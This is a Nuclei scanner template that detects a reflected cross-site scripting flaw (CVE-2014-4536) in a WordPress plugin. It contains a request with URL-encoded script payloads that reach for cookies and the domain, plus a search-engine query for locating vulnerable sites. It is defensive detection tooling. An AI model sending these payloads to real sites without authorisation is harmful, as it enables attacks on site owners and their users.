nuclei-templates/cves/2014/CVE-2014-4536.yaml

44 lines
1.7 KiB
YAML
Raw Normal View History

2021-07-30 23:01:46 +00:00
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
2021-07-30 23:01:46 +00:00
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
reference:
2021-07-30 23:01:46 +00:00
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
2022-07-11 17:26:41 +00:00
metadata:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: cve,cve2014,wordpress,wp-plugin,xss
2021-07-30 23:01:46 +00:00
requests:
- method: GET
path:
2021-07-31 03:13:27 +00:00
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
2021-07-30 23:01:46 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-31 03:13:27 +00:00
- '"></script><script>alert(document.domain)</script>'
2021-07-30 23:01:46 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24